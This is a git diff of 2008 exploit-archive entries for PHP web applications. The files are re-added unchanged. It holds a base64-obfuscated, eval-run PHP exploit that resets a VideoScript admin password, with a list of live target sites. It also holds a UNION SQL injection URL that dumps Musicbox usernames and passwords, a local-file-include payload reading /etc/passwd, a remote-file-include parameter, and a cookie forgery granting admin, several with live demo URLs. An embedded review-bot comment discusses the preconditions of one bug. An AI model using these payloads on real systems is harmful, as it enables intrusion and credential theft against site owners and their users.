- "YXNoZWQgZ3JheTsiPg0KICAgIDxMQUJFTCBzdHlsZT0iZm9udC13ZWlnaHQ6IGJvbGQ7ZmxvYXQ6". - "IGxlZnQ7bWFyZ2luLWxlZnQ6IC0xNTVweDt3aWR0aDoxNTBweDsiIGZvcj0iTVNER05LIj4gV2Vi". - "c2l0ZSA6Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i". - "c3A7Jm5ic3A7Jm5ic3A7aHR0cDovLzwvTEFCRUw+DQogICAgICAgICAgICAgIDxJTlBVVCBzdHls". - "ZT0id2lkdGg6IDE4MHB4OyIgdHlwZT0idGV4dCIgbmFtZT0iTVNER05LIiBpZD0iTVNER05LIj48". - "YnIgLz4NCiAgICA8TEFCRUwgc3R5bGU9ImZvbnQtd2VpZ2h0OiBib2xkO2Zsb2F0OiBsZWZ0O21h". - "cmdpbi1sZWZ0OiAtMTU1cHg7d2lkdGg6MTUwcHg7IiBmb3I9IlBBVEgiPlBhdGg6ICggL3Njcmlw". - "dC8gKTwvTEFCRUw+DQogICAgICAgICAgICAgIDxJTlBVVCBzdHlsZT0id2lkdGg6IDE4MHB4OyIg". - "dHlwZT0idGV4dCIgbmFtZT0iUEFUSCIgaWQ9IlBBVEgiIHZhbHVlPSIvIj48QlI+DQogICAgPFAg". - "c3R5bGU9IndpZHRoOiAzMDBweDtjbGVhcjogbGVmdDttYXJnaW46IDA7cGFkZGluZzogNXB4IDAg". - "OHB4IDA7cGFkZGluZy1sZWZ0OiAxNTVweDtib3JkZXItdG9wOiAxcHggZGFzaGVkIGdyYXk7Ij4N". - "Cgk8TEFCRUwgc3R5bGU9ImZvbnQtd2VpZ2h0OiBib2xkO2Zsb2F0OiBsZWZ0O21hcmdpbi1sZWZ0". - "OiAtMTU1cHg7d2lkdGg6MTUwcHg7IiBmb3I9Im5wdyI+IE5ldyBQYXNzd29yZCA6IDwvTEFCRUw+". - "DQogICAgICAgICAgICAgIDxJTlBVVCBzdHlsZT0id2lkdGg6IDE4MHB4OyIgdHlwZT0idGV4dCIg". - "bmFtZT0ibnB3IiBpZD0ibnB3Ij48QlI+DQoJPFAgc3R5bGU9IndpZHRoOiAzMDBweDtjbGVhcjog". - "bGVmdDttYXJnaW46IDA7cGFkZGluZzogNXB4IDAgOHB4IDA7cGFkZGluZy1sZWZ0OiAxNTVweDti". - "b3JkZXItdG9wOiAxcHggZGFzaGVkIGdyYXk7Ij4NCiAgICA8SU5QVVQgdHlwZT0ic3VibWl0IiBu". - "YW1lPSJzdWJtaXQiIHZhbHVlPSJDaGFuZ2UgaXQhIj4gPElOUFVUIHR5cGU9InJlc2V0Ij4NCiAg". - "ICA8L1A+DQogPC9GT1JNPg0KRkZGOw0KaWYgKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pICYmIGlz". - "c2V0KCRfUE9TVFsiTVNER05LIl0pICYmICFlbXB0eSgkX1BPU1RbIk1TREdOSyJdKSAmJiBpc3Nl". - "dCgkX1BPU1RbJ25wdyddKSAmJiAhZW1wdHkoJF9QT1NUWyducHcnXSkgJiYgaXNzZXQoJF9QT1NU". - "WyJQQVRIIl0pICYmICFlbXB0eSgkX1BPU1RbIlBBVEgiXSkpIHskbmV3X3B3ZCA9ICRfUE9TVFsn". - "bnB3J107JHRlaGRhZGVfY2hhcnogPSBzdHJsZW4odXJsZW5jb2RlKCRuZXdfcHdkKSkgKiAyICsg". - "Mjg7JGpva2U9IlBPU1QgIi4kX1BPU1RbIlBBVEgiXS4iYWRtaW4vY3AucGhwIEhUVFAvMS4xXHJc". 
- "bkhvc3Q6ICIuJF9QT1NUWyJNU0RHTksiXS4iXHJcblVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChX". - "aW5kb3dzOyBVOyBXaW5kb3dzIE5UIDUuMTsgZW4tVVM7IHJ2OjEuOSkgR2Vja28vMjAwODA1Mjkw". - "NiBGaXJlZm94LzMuMFxyXG5LZWVwLUFsaXZlOiAzMDBcclxuQ29ubmVjdGlvbjoga2VlcC1hbGl2". - "ZVxyXG5Db250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZFxyXG5D". - "b250ZW50LUxlbmd0aDogIi4kdGVoZGFkZV9jaGFyei4iXHJcblxyXG5ucGFzcz0iLiRuZXdfcHdk". - "LiImbnBhc3MxPSIuJG5ld19wd2QuIiZTdWJtaXQ9U3VibWl0XHJcbiI7JHJlcz0iIjskYXR0YWNr". - "ID0gZnNvY2tvcGVuKCRfUE9TVFsiTVNER05LIl0sIjgwIiwkZXJybm8sICRlcnJzdHIsIDUwKTtp". - "ZighJGF0dGFjayl7ZWNobygiPGJyIC8+V1RGLCBlcnIjOiAoJGVycm5vKS4kZXJyc3RyIik7cmV0". - "dXJuO31lY2hvKCI8c3BhbiBzdHlsZT1cImZvbnQ6bm9ybWFsIDhwdCB0YWhvbWE7XCI+Jm5ic3A7". - "Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7WytdIDxiPkNvbm5lY3RlZC4uLjxici8+PC9iPiZuYnNw". - "OyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO1srXSA8Yj5TZW5kaW5nIHJlcXVlc3QuLi48YnIvPjwv". - "Yj4iKTtmd3JpdGUoJGF0dGFjaywkam9rZSk7d2hpbGUoIWZlb2YoJGF0dGFjaykpeyRyZXMuPWZn". - "ZXRzKCRhdHRhY2spO31mY2xvc2UoJGF0dGFjayk7aWYgKHN0cmlzdHIoJHJlcywgInNhdmVkIikg". - "fHwgc3RyaXN0cigkcmVzLCAiY2hhbmdlZCIpKXtlY2hvICImbmJzcDsmbmJzcDsmbmJzcDsmbmJz". - "cDsmbmJzcDtbK108Yj4gRXhwbG9pdGVkICEgLCA8Zm9udCBjb2xvcj1cInJlZFwiPlBhc3N3b3Jk". - "IGNoYW5nZWQuLi48L2I+PC9mb250PjxiciAvPiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNw". - "O1srXSAuLi48YnIgLz4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtbK10gPGI+bmV3IHBh". - "c3N3b3JkOjwvYj4gIi4kbmV3X3B3ZC4iPGJyIC8+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i". - "c3A7WytdPGI+IGFkbWluIHBhbmVsOjwvYj4gaHR0cDovLyIuJF9QT1NUWyJNU0RHTksiXS4kX1BP". - "U1RbIlBBVEgiXS4iYWRtaW4vPGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJy". - "IC8+PHNwYW4gc3R5bGU9XCJmb250Om5vcm1hbCA4cHQgdGFob21hO2NvbG9yOiNDQ0M7XCI+RXhw". - "bG9pdCBCeSBHNE4wSy4uLjwvc3Bhbj4iO30gZWxzZSB7IGVjaG8gIiZuYnNwOyZuYnNwOyZuYnNw". - "OyZuYnNwOyZuYnNwO1srXTxiPiBPb3BzICwgIHNyeSAsICA8dT5ub3QgVnVsbmVyYWJsZTwvdT4g". 
- "LiAuIC4gITwvYj4iO31mbHVzaCgpO31lbHNle2VjaG8kRk9STTt9DQo="; - eval(base64_decode($G4N0K)); - -/* ===[ LIVE ]=== - - [»] www.xxxuploads.co.uk - [»] www.gayphp.com - [»] ... - - -===[ Greetz ]=== - - [»] ALLAH - [»] Tornado2800 // bedone in nemishe :D - [»] Hussain-X // Jazakallah... - [»] Str0ke //Hey Brotha keep rocking on ;) - [»] Soudi-L0rd,Sakab... - [»] SMN,MSD-KiD,AMD,MSN... - - Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - ALLAH,forgimme... - */ -?> - -# milw0rm.com [2008-11-17] + ] + + + ===[ XPL ]=== + */ + +error_reporting(E_ALL); + $G4N0K = "JEc0TjBLID0gPDw8RU9HDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09". + "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCiAgICAgICAgICAgICAgICAg". + "ICAgICBfICAgICAgXyAgICAgICBfICAgICAgICAgIF8gICAgICBfICAgXyANCiAgICAgICAgICAg". + "ICAgICAgICAgIC8gXCAgICB8IHwgICAgIHwgfCAgICAgICAgLyBcICAgIHwgfCB8IHwNCiAgICAg". + "ICAgICAgICAgICAgICAgLyBfIFwgICB8IHwgICAgIHwgfCAgICAgICAvIF8gXCAgIHwgfF98IHwN". + "CiAgICAgICAgICAgICAgICAgICAvIF9fXyBcICB8IHxfX18gIHwgfF9fXyAgIC8gX19fIFwgIHwg". + "IF8gIHwNCiAgIElOIFRIRSBOQU1FIE9GIC9fLyAgIFxfXCB8X19fX198IHxfX19fX3wgL18vICAg". + "XF9cIHxffCB8X3wNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg". + "ICAgICAgICAgICAgICAgICANCg0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09". + "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQogICAgICAgICAgICAg". + "ICAgICAgICAgX19fXyAgIF8gIF8gICAgIF8gICBfICAgIF9fXyAgICBfICBfXw0KICAgICAgICAg". + "ICAgICAgICAgICAgLyBfX198IHwgfHwgfCAgIHwgXCB8IHwgIC8gXyBcICB8IHwvIC8NCiAgICAg". + "ICAgICAgICAgICAgICAgfCB8ICBfICB8IHx8IHxfICB8ICBcfCB8IHwgfCB8IHwgfCAnIC8gDQog". + "ICAgICAgICAgICAgICAgICAgIHwgfF98IHwgfF9fICAgX3wgfCB8XCAgfCB8IHxffCB8IHwgLiBc". + "IA0KICAgICAgICAgZVhwbG8hdCBCeSAgXF9fX198ICAgIHxffCAgIHxffCBcX3wgIFxfX18vICB8". + "X3xcX1wNCg0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09". 
+ "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQoJVmlkZW9TY3JpcHQgPD0gNC4wLjEuNTAg". + "QWRtaW4gQ2hhbmdlIFBhc3N3b3JkIEV4cGxvaXQNCj09PT09PT09PT09PT09PT09PT09PT09PT09". + "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KDQpF". + "T0c7DQplY2hvICI8cHJlPiIuJEc0TjBLLiI8L3ByZT4iOw0KJEZPUk0gPSAiPEZPUk0gYWN0aW9u". + "PVwiIi4kX1NFUlZFUlsiUEhQX1NFTEYiXS4iXCIgbWV0aG9kPVwiUE9TVFwiPiI7JEZPUk0uPSA8". + "PDxGRkYNCiAgICA8UCBzdHlsZT0id2lkdGg6IDMwMHB4O2NsZWFyOiBsZWZ0O21hcmdpbjogMDtw". + "YWRkaW5nOiA1cHggMCA4cHggMDtwYWRkaW5nLWxlZnQ6IDE1NXB4O2JvcmRlci10b3A6IDFweCBk". + "YXNoZWQgZ3JheTsiPg0KICAgIDxMQUJFTCBzdHlsZT0iZm9udC13ZWlnaHQ6IGJvbGQ7ZmxvYXQ6". + "IGxlZnQ7bWFyZ2luLWxlZnQ6IC0xNTVweDt3aWR0aDoxNTBweDsiIGZvcj0iTVNER05LIj4gV2Vi". + "c2l0ZSA6Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i". + "c3A7Jm5ic3A7Jm5ic3A7aHR0cDovLzwvTEFCRUw+DQogICAgICAgICAgICAgIDxJTlBVVCBzdHls". + "ZT0id2lkdGg6IDE4MHB4OyIgdHlwZT0idGV4dCIgbmFtZT0iTVNER05LIiBpZD0iTVNER05LIj48". + "YnIgLz4NCiAgICA8TEFCRUwgc3R5bGU9ImZvbnQtd2VpZ2h0OiBib2xkO2Zsb2F0OiBsZWZ0O21h". + "cmdpbi1sZWZ0OiAtMTU1cHg7d2lkdGg6MTUwcHg7IiBmb3I9IlBBVEgiPlBhdGg6ICggL3Njcmlw". + "dC8gKTwvTEFCRUw+DQogICAgICAgICAgICAgIDxJTlBVVCBzdHlsZT0id2lkdGg6IDE4MHB4OyIg". + "dHlwZT0idGV4dCIgbmFtZT0iUEFUSCIgaWQ9IlBBVEgiIHZhbHVlPSIvIj48QlI+DQogICAgPFAg". + "c3R5bGU9IndpZHRoOiAzMDBweDtjbGVhcjogbGVmdDttYXJnaW46IDA7cGFkZGluZzogNXB4IDAg". + "OHB4IDA7cGFkZGluZy1sZWZ0OiAxNTVweDtib3JkZXItdG9wOiAxcHggZGFzaGVkIGdyYXk7Ij4N". + "Cgk8TEFCRUwgc3R5bGU9ImZvbnQtd2VpZ2h0OiBib2xkO2Zsb2F0OiBsZWZ0O21hcmdpbi1sZWZ0". + "OiAtMTU1cHg7d2lkdGg6MTUwcHg7IiBmb3I9Im5wdyI+IE5ldyBQYXNzd29yZCA6IDwvTEFCRUw+". + "DQogICAgICAgICAgICAgIDxJTlBVVCBzdHlsZT0id2lkdGg6IDE4MHB4OyIgdHlwZT0idGV4dCIg". + "bmFtZT0ibnB3IiBpZD0ibnB3Ij48QlI+DQoJPFAgc3R5bGU9IndpZHRoOiAzMDBweDtjbGVhcjog". + "bGVmdDttYXJnaW46IDA7cGFkZGluZzogNXB4IDAgOHB4IDA7cGFkZGluZy1sZWZ0OiAxNTVweDti". + "b3JkZXItdG9wOiAxcHggZGFzaGVkIGdyYXk7Ij4NCiAgICA8SU5QVVQgdHlwZT0ic3VibWl0IiBu". 
+ "YW1lPSJzdWJtaXQiIHZhbHVlPSJDaGFuZ2UgaXQhIj4gPElOUFVUIHR5cGU9InJlc2V0Ij4NCiAg". + "ICA8L1A+DQogPC9GT1JNPg0KRkZGOw0KaWYgKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pICYmIGlz". + "c2V0KCRfUE9TVFsiTVNER05LIl0pICYmICFlbXB0eSgkX1BPU1RbIk1TREdOSyJdKSAmJiBpc3Nl". + "dCgkX1BPU1RbJ25wdyddKSAmJiAhZW1wdHkoJF9QT1NUWyducHcnXSkgJiYgaXNzZXQoJF9QT1NU". + "WyJQQVRIIl0pICYmICFlbXB0eSgkX1BPU1RbIlBBVEgiXSkpIHskbmV3X3B3ZCA9ICRfUE9TVFsn". + "bnB3J107JHRlaGRhZGVfY2hhcnogPSBzdHJsZW4odXJsZW5jb2RlKCRuZXdfcHdkKSkgKiAyICsg". + "Mjg7JGpva2U9IlBPU1QgIi4kX1BPU1RbIlBBVEgiXS4iYWRtaW4vY3AucGhwIEhUVFAvMS4xXHJc". + "bkhvc3Q6ICIuJF9QT1NUWyJNU0RHTksiXS4iXHJcblVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChX". + "aW5kb3dzOyBVOyBXaW5kb3dzIE5UIDUuMTsgZW4tVVM7IHJ2OjEuOSkgR2Vja28vMjAwODA1Mjkw". + "NiBGaXJlZm94LzMuMFxyXG5LZWVwLUFsaXZlOiAzMDBcclxuQ29ubmVjdGlvbjoga2VlcC1hbGl2". + "ZVxyXG5Db250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZFxyXG5D". + "b250ZW50LUxlbmd0aDogIi4kdGVoZGFkZV9jaGFyei4iXHJcblxyXG5ucGFzcz0iLiRuZXdfcHdk". + "LiImbnBhc3MxPSIuJG5ld19wd2QuIiZTdWJtaXQ9U3VibWl0XHJcbiI7JHJlcz0iIjskYXR0YWNr". + "ID0gZnNvY2tvcGVuKCRfUE9TVFsiTVNER05LIl0sIjgwIiwkZXJybm8sICRlcnJzdHIsIDUwKTtp". + "ZighJGF0dGFjayl7ZWNobygiPGJyIC8+V1RGLCBlcnIjOiAoJGVycm5vKS4kZXJyc3RyIik7cmV0". + "dXJuO31lY2hvKCI8c3BhbiBzdHlsZT1cImZvbnQ6bm9ybWFsIDhwdCB0YWhvbWE7XCI+Jm5ic3A7". + "Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7WytdIDxiPkNvbm5lY3RlZC4uLjxici8+PC9iPiZuYnNw". + "OyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO1srXSA8Yj5TZW5kaW5nIHJlcXVlc3QuLi48YnIvPjwv". + "Yj4iKTtmd3JpdGUoJGF0dGFjaywkam9rZSk7d2hpbGUoIWZlb2YoJGF0dGFjaykpeyRyZXMuPWZn". + "ZXRzKCRhdHRhY2spO31mY2xvc2UoJGF0dGFjayk7aWYgKHN0cmlzdHIoJHJlcywgInNhdmVkIikg". + "fHwgc3RyaXN0cigkcmVzLCAiY2hhbmdlZCIpKXtlY2hvICImbmJzcDsmbmJzcDsmbmJzcDsmbmJz". + "cDsmbmJzcDtbK108Yj4gRXhwbG9pdGVkICEgLCA8Zm9udCBjb2xvcj1cInJlZFwiPlBhc3N3b3Jk". + "IGNoYW5nZWQuLi48L2I+PC9mb250PjxiciAvPiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNw". + "O1srXSAuLi48YnIgLz4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtbK10gPGI+bmV3IHBh". 
+ "c3N3b3JkOjwvYj4gIi4kbmV3X3B3ZC4iPGJyIC8+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i". + "c3A7WytdPGI+IGFkbWluIHBhbmVsOjwvYj4gaHR0cDovLyIuJF9QT1NUWyJNU0RHTksiXS4kX1BP". + "U1RbIlBBVEgiXS4iYWRtaW4vPGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJy". + "IC8+PHNwYW4gc3R5bGU9XCJmb250Om5vcm1hbCA4cHQgdGFob21hO2NvbG9yOiNDQ0M7XCI+RXhw". + "bG9pdCBCeSBHNE4wSy4uLjwvc3Bhbj4iO30gZWxzZSB7IGVjaG8gIiZuYnNwOyZuYnNwOyZuYnNw". + "OyZuYnNwOyZuYnNwO1srXTxiPiBPb3BzICwgIHNyeSAsICA8dT5ub3QgVnVsbmVyYWJsZTwvdT4g". + "LiAuIC4gITwvYj4iO31mbHVzaCgpO31lbHNle2VjaG8kRk9STTt9DQo="; + eval(base64_decode($G4N0K)); + +/* ===[ LIVE ]=== + + [»] www.xxxuploads.co.uk + [»] www.gayphp.com + [»] ... + + +===[ Greetz ]=== + + [»] ALLAH + [»] Tornado2800 // bedone in nemishe :D + [»] Hussain-X // Jazakallah... + [»] Str0ke //Hey Brotha keep rocking on ;) + [»] Soudi-L0rd,Sakab... + [»] SMN,MSD-KiD,AMD,MSN... + + Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) + ALLAH,forgimme... + */ +?> + +# milw0rm.com [2008-11-17] diff --git a/platforms/php/webapps/7152.txt b/platforms/php/webapps/7152.txt index cf608b195..4a28a83df 100755 --- a/platforms/php/webapps/7152.txt +++ b/platforms/php/webapps/7152.txt 
@@ -1,38 +1,38 @@ -================================================================================================================== - SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM - S N N N A A K K E S T E A A M M M M - SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M - S N N N A A K K E S T E A A M M M - SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M -===================================================SNAKES TEAM==================================================== - - Script: Musicbox Version 2.3.8 Remote SQL Injection Vulnerability - -==============================================:::ALGERIAN HaCkEr:::=============================================== - = = = = - = = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = = - = = - = = ************ ::::::home : www.snakespc.com/sc::::::*************** = = - = = - = = :::::Mail: snakespc@gmail.com::::::: = = - = = - = Sript Demo:http://www.musicboxv2.com/services/demo.php = - = www.musicboxv2.com = - =================================== Snakespc ====================================== - - -Exploit: - -http://www.localhost/version2.3.8/viewalbums.php?artistId=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users-- - -Demo : - -http://www.musicboxv2.com/version2.3.8/viewalbums.php?artistId=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users-- - -=================================================================================================================== -Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or:: -ALL www.Snakespc.com/SC >>>> Members -str0ke.....>>>>.....milw0rm -=================================================================================================================== - -# milw0rm.com [2008-11-18] +================================================================================================================== + SSSSS NN N AA K K EEEEE SSSSS 
TTTTTTTTT EEEEE AA MM MM + S N N N A A K K E S T E A A M M M M + SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M + S N N N A A K K E S T E A A M M M + SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M +===================================================SNAKES TEAM==================================================== + + Script: Musicbox Version 2.3.8 Remote SQL Injection Vulnerability + +==============================================:::ALGERIAN HaCkEr:::=============================================== + = = = = + = = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = = + = = + = = ************ ::::::home : www.snakespc.com/sc::::::*************** = = + = = + = = :::::Mail: snakespc@gmail.com::::::: = = + = = + = Sript Demo:http://www.musicboxv2.com/services/demo.php = + = www.musicboxv2.com = + =================================== Snakespc ====================================== + + +Exploit: + +http://www.localhost/version2.3.8/viewalbums.php?artistId=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users-- + +Demo : + +http://www.musicboxv2.com/version2.3.8/viewalbums.php?artistId=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users-- + +=================================================================================================================== +Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or:: +ALL www.Snakespc.com/SC >>>> Members +str0ke.....>>>>.....milw0rm +=================================================================================================================== + +# milw0rm.com [2008-11-18] diff --git a/platforms/php/webapps/7153.txt b/platforms/php/webapps/7153.txt index ea87eb9f9..513155e50 100755 --- a/platforms/php/webapps/7153.txt +++ b/platforms/php/webapps/7153.txt 
@@ -1,80 +1,80 @@ -Hello, bugtraq. - -Digital Security Research Group [DSecRG] Advisory #DSECRG-08-039 - - -Application: Pluck CMS -Versions Affected: 4.5.3 -Vendor URL: http://www.pluck-cms.org/ -Bug: Local File Include -Exploits: YES -Reported: 25.08.2008 -Vendor Response: 30.08.2008 -Solution: YES -Date of Public Advisory: 18.11.2008 -Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) - - - -Description -*********** - -Pluck CMS has Local File Include vulnerability. - - - -Details -******* - -1. Local File Include vulnerability found in script data/inc/lib/pcltar.lib.php - -Successful exploitation requires that "register_globals" is enabled. - -Code ----- -################################################# - - if (!isset($g_pcltar_lib_dir)) - $g_pcltar_lib_dir = "lib"; - -... - - $g_pcltar_extension = "php"; - - if (!defined("PCLERROR_LIB")) - { - include("data/inc/$g_pcltar_lib_dir/pclerror.lib.$g_pcltar_extension"); - } - if (!defined("PCLTRACE_LIB")) - { - include("data/inc/$g_pcltar_lib_dir/pcltrace.lib.$g_pcltar_extension"); - } - -################################################# - -Example: - -http://[server]/[installdir]/data/inc/lib/pcltar.lib.php?g_pcltar_lib_dir=../../../../../../../../../../../../../etc/passwd%00 - - - -Solution -******** -Vendor fix this flaw on 09.08.2008. New version of Pluck CMS 4.6 can be download here: - - -http://www.pluck-cms.org/downloads/click.php?id=8 - - - -About -***** - -Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. -Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. 
- - -Contact: research [at] dsec [dot] ru - http://www.dsec.ru (in Russian) - -# milw0rm.com [2008-11-18] +Hello, bugtraq. + +Digital Security Research Group [DSecRG] Advisory #DSECRG-08-039 + + +Application: Pluck CMS +Versions Affected: 4.5.3 +Vendor URL: http://www.pluck-cms.org/ +Bug: Local File Include +Exploits: YES +Reported: 25.08.2008 +Vendor Response: 30.08.2008 +Solution: YES +Date of Public Advisory: 18.11.2008 +Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) + + + +Description +*********** + +Pluck CMS has Local File Include vulnerability. + + + +Details +******* + +1. Local File Include vulnerability found in script data/inc/lib/pcltar.lib.php + +Successful exploitation requires that "register_globals" is enabled. + +Code +---- +################################################# + + if (!isset($g_pcltar_lib_dir)) + $g_pcltar_lib_dir = "lib"; + +... + + $g_pcltar_extension = "php"; + + if (!defined("PCLERROR_LIB")) + { + include("data/inc/$g_pcltar_lib_dir/pclerror.lib.$g_pcltar_extension"); + } + if (!defined("PCLTRACE_LIB")) + { + include("data/inc/$g_pcltar_lib_dir/pcltrace.lib.$g_pcltar_extension"); + } + +################################################# + +Example: + +http://[server]/[installdir]/data/inc/lib/pcltar.lib.php?g_pcltar_lib_dir=../../../../../../../../../../../../../etc/passwd%00 + + + +Solution +******** +Vendor fix this flaw on 09.08.2008. New version of Pluck CMS 4.6 can be download here: + + +http://www.pluck-cms.org/downloads/click.php?id=8 + + + +About +***** + +Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. +Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. 
+ + +Contact: research [at] dsec [dot] ru + http://www.dsec.ru (in Russian) + +# milw0rm.com [2008-11-18] diff --git a/platforms/php/webapps/7155.txt b/platforms/php/webapps/7155.txt index b4ac8ef95..cc13b73b2 100755 --- a/platforms/php/webapps/7155.txt +++ b/platforms/php/webapps/7155.txt 
@@ -1,24 +1,24 @@ -#################################################################################################### -# Directory v1.1.1 (API_HOME_DIR) RFI Vulnerablity # -# © Ghost Hacker , Real Hack Back :) # -#################################################################################################### -#[~] Author : Ghost Hacker # -#[~] Homepage : www.Real-h.com [Real Hack Back] # -#[~] Contact Me : Ghost-r00t[at]Hotmail[dot]com # -#[~] Bug : RFI # -#[~] From : Kingdom Saudi Arabia # -#[~] Name Script : Directory v1.1.1 # -#[~] Download : http://www.freedirectoryscript.com/download/fds-v111-rc.zip # -#################################################################################################### -#[~] Exploit : # -# init.php?API_HOME_DIR=Evil_Code # -#################################################################################################### -#[~]GreetZ : # -# Mr.SaFa7 , Mr-3sheq , aBo3tB , Night Mare , Root Hacker , Dmar al3noOoz # -# Mr.MN7oS , Mr.Hope , Scary.Hacker , Qabandi , v4-team.com # -# All Members Real Hack , All My Friends :) # -#################################################################################################### -# Viva Real Hack - Real-h.com .. 
# -#################################################################################################### - -# milw0rm.com [2008-11-18] +#################################################################################################### +# Directory v1.1.1 (API_HOME_DIR) RFI Vulnerablity # +# © Ghost Hacker , Real Hack Back :) # +#################################################################################################### +#[~] Author : Ghost Hacker # +#[~] Homepage : www.Real-h.com [Real Hack Back] # +#[~] Contact Me : Ghost-r00t[at]Hotmail[dot]com # +#[~] Bug : RFI # +#[~] From : Kingdom Saudi Arabia # +#[~] Name Script : Directory v1.1.1 # +#[~] Download : http://www.freedirectoryscript.com/download/fds-v111-rc.zip # +#################################################################################################### +#[~] Exploit : # +# init.php?API_HOME_DIR=Evil_Code # +#################################################################################################### +#[~]GreetZ : # +# Mr.SaFa7 , Mr-3sheq , aBo3tB , Night Mare , Root Hacker , Dmar al3noOoz # +# Mr.MN7oS , Mr.Hope , Scary.Hacker , Qabandi , v4-team.com # +# All Members Real Hack , All My Friends :) # +#################################################################################################### +# Viva Real Hack - Real-h.com .. # +#################################################################################################### + +# milw0rm.com [2008-11-18] diff --git a/platforms/php/webapps/7156.txt b/platforms/php/webapps/7156.txt index e91fc3823..156e68a69 100755 --- a/platforms/php/webapps/7156.txt +++ b/platforms/php/webapps/7156.txt 
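Review bot: The advisory names the injection point, `init.php?API_HOME_DIR=Evil_Code`, but states no precondition: a bare GET parameter becoming the PHP variable used in an include implies `register_globals=On`, and pulling a remote file additionally needs `allow_url_include` (or `allow_url_fopen` on PHP older than 5.2), so on a hardened install this does not fire at all. A line such as `#[~] Requires : register_globals=On, allow_url_include=On (unverified)` under the Bug field would make the scope clear to readers. The hunk re-adds the text unchanged as far as this rendering shows, so the gap predates this commit.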
@@ -1,19 +1,19 @@ --=================================================- -Autore: x0r -Bug: Insecure Cookie Handling -Cms: E-TopBiz Link Back Checker 1 --================================================- - -Exploit: - -javascript:document.cookie="auth=admin; path=/"; - -Live Demo: -http://e-topbiz.com/trafficdemos/linkback1/admincontrol/login.php - -Greetz: Grazie alla persona che mi ha cambiato la vita, amore sto parlando -dite, sei il mio angelo custode ti amo troppo 8\10\08 PER SEMPRE. - -EoF - -# milw0rm.com [2008-11-18] +-=================================================- +Autore: x0r +Bug: Insecure Cookie Handling +Cms: E-TopBiz Link Back Checker 1 +-================================================- + +Exploit: + +javascript:document.cookie="auth=admin; path=/"; + +Live Demo: +http://e-topbiz.com/trafficdemos/linkback1/admincontrol/login.php + +Greetz: Grazie alla persona che mi ha cambiato la vita, amore sto parlando +dite, sei il mio angelo custode ti amo troppo 8\10\08 PER SEMPRE. + +EoF + +# milw0rm.com [2008-11-18] diff --git a/platforms/php/webapps/7157.txt b/platforms/php/webapps/7157.txt index 4f9a79889..890c7fa51 100755 --- a/platforms/php/webapps/7157.txt +++ b/platforms/php/webapps/7157.txt 
